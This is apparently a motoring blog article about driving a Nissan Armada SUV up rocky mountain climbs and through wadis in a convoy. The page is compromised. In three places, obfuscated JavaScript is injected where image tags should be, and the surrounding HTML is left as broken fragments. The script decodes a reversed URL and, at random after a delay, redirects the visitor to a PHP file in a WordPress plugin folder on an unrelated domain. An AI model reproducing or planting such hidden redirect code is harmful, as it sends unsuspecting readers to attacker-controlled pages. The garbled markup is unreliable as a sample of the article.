The temptation to go hell for leather immediately is almost overwhelming during the short burst downhill before the climb starts. If I stamp on the throttle now though – even considering the amount of ground clearance at my disposal – I could violently jolt the underbody, and be in serious trouble halfway up the climb. But soon the ground starts to rise, the Armada’s nose creeps up a few inches, and my right foot goes down. Hard.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/File0660.jpg” alt=”” width=”728″ height=”485″ />

Seconds later, any thoughts I’d had that the Armada would let me down are gone. Suddenly I’m racing up the mountainside, tyres pounding the loose gravel, a wall of dust completely blocking my view and revs screaming their determination. But I’m not lifting, and nor for that matter is the Armada. A behemoth on the road, this SUV has suddenly become an off-road weapon, jolting left and right as I pound my way up the climb but refusing to slip or miss a beat. I hit the summit, and laugh. That run should have been impossible, shouldn’t it?

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/File0500.jpg” alt=”” width=”728″ height=”485″ />

For the next hour or so, inclines and sheer drops appear more rapidly than before, the Armada drilling its way straight through each time. Others are not so lucky though, and as our convoy drives deeper into the wadis, we start to suffer causalities. First there’s one puncture, then another, and another, and soon the path is littered with drivers checking the underside of their vehicles, positive that the bang they’d just heard had to have done some damage.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/05/File0701.jpg” alt=”” width=”728″ height=”485″ />

Shortly before we hit the halfway point, one gentleman finds himself well out of shape on an elevation he’s misjudged, and it’s a good half an hour before his SUV is pulled free of the rocks. Nobody’s hurt and he shares a joke with those who’ve stopped to help, but the accident has clearly rattled him. When we finally reach the end of the mountain section, he decides to skip the remainder of the afternoon in favour of a long lunch break.
